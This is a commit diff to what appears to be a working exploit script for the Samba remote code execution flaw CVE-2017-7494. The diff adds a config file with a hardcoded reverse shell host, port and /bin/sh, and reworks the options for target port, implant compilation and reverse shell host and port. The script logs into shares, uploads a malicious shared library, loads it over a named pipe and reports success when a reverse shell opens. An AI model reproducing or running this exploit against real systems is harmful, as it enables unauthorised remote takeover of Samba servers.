New update

joxeankoret · Nov 26, 2017 · 126d0c0 · 126d0c0
1 parent 861f605
commit 126d0c0
Show file tree

Hide file tree

Showing 2 changed files with 42 additions and 17 deletions.
diff --git a/config.h b/config.h
@@ -1 +1,4 @@
-
+#define SHELL_PORT 1337
+#define SHELL_HOST "10.10.10.109"
+#define SHELL_BINARY "/bin/sh"
+#define USE_OLD_ENTRYPOINT 1
diff --git a/cve_2017_7494.py b/cve_2017_7494.py
@@ -44,10 +44,12 @@ class CSmbExploit:
   def __init__(self, options):
     self.hostname = options.host
     self.port = options.port
-    self.target = options.target
+    self.sambaTarget = options.sambaTarget
+    self.sambaPort = options.sambaPort
     self.module = options.module
     self.username = options.username
     self.sambaOld = options.sambaVersion
+    self.noimplant = options.noimplant
     if self.username is None:
       self.username = ""
     self.password = options.password
@@ -60,10 +62,11 @@ def __init__(self, options):
     self.smb = None
 
   def load_module(self, module):
-    module = '\\\PIPE\\' + module  
+    if int(self.sambaOld) == 1:
+	  module = '\\\PIPE\\' + module  
 
     log("Trying to load module %s" % module)
-    stringbinding = r'ncacn_np:%s[\pipe\%s]' % (self.target, module)
+    stringbinding = r'ncacn_np:%s[\pipe\%s]' % (self.sambaTarget, module)
     sb = transport.DCERPCStringBinding(stringbinding)
     na = sb.get_network_address()
     rpctransport = transport.SMBTransport(na, filename = module, smb_connection = self.smb)
@@ -87,6 +90,11 @@ def get_random_name(self, total=8):
     return "%s.so" % ret
 
   def make_library(self):
+
+    if int(self.noimplant) == 1:
+      log("I will keep the current binaries. No need for new compilation.")
+      return True
+
     if self.hostname is None:
       l = self.get_my_ip()
       if len(l) == 0:
@@ -142,6 +150,7 @@ def try_copy_library(self, lib_name):
     # Randomize the list of shares instead of going from the first to the last
     random.shuffle(l)
     real_file = self.get_real_library_name()
+    log("Using %s" % real_file)
     for share in l:
       log("Trying to copy library '%s' to share '%s'" % (lib_name, share))
       if self.try_put(share, lib_name, real_file):
@@ -152,7 +161,7 @@ def try_copy_library(self, lib_name):
 
   def do_login(self):
     try:
-      self.smb = SMBConnection(remoteName='*SMBSERVER', remoteHost=self.target)
+      self.smb = SMBConnection(remoteName='*SMBSERVER', remoteHost=self.sambaTarget, sess_port=int(self.sambaPort))
       self.smb.login(user=self.username, password=self.password)
       if self.smb.isGuestSession():
         log("Using a GUEST session")
@@ -166,7 +175,7 @@ def exploit(self):
       log("Error building library:")
       return False
 
-    log("Logging into the Samba server %s..." % self.target)
+    log("Logging into the Samba server %s:%s" % (self.sambaTarget, self.sambaPort))
     if not self.do_login():
       log("Cannot log into the Samba server...")
       return False
@@ -188,26 +197,39 @@ def exploit(self):
 #-------------------------------------------------------------------------------
 def main():
   parser = OptionParser()
-  parser.add_option("-t", "--target", dest="target", help="target ip address")
+
+  parser.add_option("-t", "--target", dest="sambaTarget", help="target ip address")
+  parser.add_option("-p", "--port", dest="sambaPort", default=445, help="target port")
+
   msg = "module path on target server (do not use to auto-resolve the module's path)"
   parser.add_option("-m", "--module", dest="module", help=msg)
-  msg = "Hostname for reverse shell"
-  parser.add_option("-H", "--host", dest="host", help=msg)
-  msg = "Port for reverse shell"
-  parser.add_option("-p", "--port", dest="port", default=31337, help=msg)
-  msg = "Username to login into the Samba server"
-  parser.add_option("-u", "--username", dest="username", help=msg)
-  msg = "Password to login into the Samba server"
-  parser.add_option("-P", "--password", dest="password", help=msg)
+
   msg = "Use a 32 bit payload (by default, it uses a x86_64 one)"
   parser.add_option("-x", "--use-x32", dest="is_32", default=False, help=msg)
+
   msg = "Shell to use (by default /bin/sh)"
   parser.add_option("-s", "--shell", dest="shell", default="/bin/sh", help=msg)
+
   msg = "Use old entry point for share library (samba 3.5.0 / 3.6.0))"
   parser.add_option("-o", "--old-version", dest="sambaVersion", default=0, help=msg)
-
+
+  msg = "Do not compile libimplant*.so"
+  parser.add_option("-n", "--no-compile", dest="noimplant", default=0, help=msg)
+
+  #login
+  msg = "Username to login into the Samba server"
+  parser.add_option("-u", "--username", dest="username", help=msg)
+  msg = "Password to login into the Samba server"
+  parser.add_option("-P", "--password", dest="password", help=msg)
+
+  #reverse shell
+  msg = "Hostname for reverse shell"
+  parser.add_option("--rhost", dest="host", help=msg)
+  msg = "Port for reverse shell"
+  parser.add_option("--rport", dest="port", default=31337, help=msg)
+
   (options, args) = parser.parse_args()
-  if options.target:
+  if options.sambaTarget:
     exploit = CSmbExploit(options)
     if exploit.exploit():
       log("Success! You should have a reverse shell by now :)")